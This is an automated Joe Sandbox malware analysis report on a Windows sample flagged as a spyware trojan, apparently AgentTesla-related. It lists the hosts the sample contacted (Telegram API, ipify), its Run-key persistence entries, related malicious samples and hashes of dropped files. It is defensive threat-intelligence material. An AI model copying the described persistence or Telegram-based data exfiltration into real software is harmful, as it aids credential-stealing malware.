                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameizwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://james.newtonking.com/projects/jsonOefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000462D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000488D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        		api.telegram.orgUnited Kingdom
                                        		62041TELEGRAMRUfalse
                                        173.231.16.76
                                        		api4.ipify.orgUnited States
                                        		18450WEBNXUSfalse

                                        General Information

                                        Joe Sandbox Version:37.0.0 Beryl
                                        Analysis ID:830846
                                        Start date and time:2023-03-20 18:29:52 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 12m 52s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:30
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:izwFjkhFJm.exe
                                        Original Sample Name:ae2a3b41292c66a9dd6f10c874c05293.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@29/16@8/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 45
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 40.126.32.137, 20.190.160.13, 40.126.32.69, 40.126.32.132, 20.190.160.15, 20.190.160.23, 40.126.32.67, 20.190.160.21, 13.89.179.12
                                        • Excluded domains from analysis (whitelisted): prdv6a.aadg.msidentity.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, www.tm.v6.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:30:59API Interceptor90x Sleep call for process: powershell.exe modified
                                        18:31:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                        18:31:31API Interceptor590x Sleep call for process: izwFjkhFJm.exe modified
                                        18:31:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                        18:31:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                        18:31:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                        18:32:48API Interceptor17x Sleep call for process: Oefdyik.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        149.154.167.220widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                          Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                            https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                              g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                file.exeGet hashmaliciousUnknownBrowse
                                                  Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                    New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                      PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                        PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                          PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                            FixDefError.exeGet hashmaliciousXmrigBrowse
                                                              doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                  NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                    2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                      iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                        Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                          YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                            Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                173.231.16.76DttL6H1DqQ.exeGet hashmaliciousBabuk, Chaos, ContiBrowse
                                                                                • api.ipify.org/
                                                                                one.docGet hashmaliciousCryptOne, HancitorBrowse
                                                                                • api.ipify.org/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                api4.ipify.orgSmh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 104.237.62.211
                                                                                eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                • 104.237.62.211
                                                                                api.telegram.orgwidnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                • 149.154.167.220
                                                                                PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 149.154.167.220
                                                                                FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                • 149.154.167.220
                                                                                doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 149.154.167.220
                                                                                2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                Bestellung_(PO4703392)_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                TELEGRAMRUwidnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                • 149.154.167.99
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousAmadey, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                • 149.154.167.99
                                                                                setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                • 149.154.167.99
                                                                                WEBNXUSSmh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 173.231.16.76
                                                                                eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 104.237.62.211
                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                yeni_sipari#U015f.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 173.231.16.76
                                                                                DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 64.185.227.155
                                                                                FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                • 104.237.62.211

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ewidnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                Payment Invoice file.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                Budget plan 2023.zipGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                setup.exeGet hashmaliciousXmrigBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                Payment Invoice 0012657.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76
                                                                                REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                • 149.154.167.220
                                                                                • 173.231.16.76

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Oefdyik.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1459
                                                                                Entropy (8bit):5.3420905847574325
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                MD5:FB4B7720101F874710FF986326F7980F
                                                                                SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\izwFjkhFJm.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):1459
                                                                                Entropy (8bit):5.3420905847574325
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                MD5:FB4B7720101F874710FF986326F7980F
                                                                                SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                Malicious:true
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):5829
                                                                                Entropy (8bit):4.8968676994158
                                                                                Encrypted:false
                                                                                SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                Malicious:false
                                                                                Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):15672
                                                                                Entropy (8bit):5.542414046296337
                                                                                Encrypted:false
                                                                                SSDEEP:384:nte/AM1oA1uPqtIosSjn+ilr3bsFvMs48LP:OrAqtyo+ilrIRpP
                                                                                MD5:8AEBA6925AFDFB54DA529AC11C28736E
                                                                                SHA1:05C4C8EE5B22C660A33DCFFC4F0E35900AF7BC90
                                                                                SHA-256:14595BFD9842BA212582C416C1B2F4128E1AC203DB766B0F5359EB46BF1F6265
                                                                                SHA-512:3C1A1D0E2273E4E9DA27384EEE2CED1B22EEC63B102D4602903705C8D9EDA6BCF07053A2FCFE0007629EE641F4B93F2D9D06F276E06995C96529DECD51E02E5F
                                                                                Malicious:false
                                                                                Preview:@...e...........7.......$.....s.s...............................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23uza2uz.txl.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ch2n5eak.wf2.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5xdroaz.3qx.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
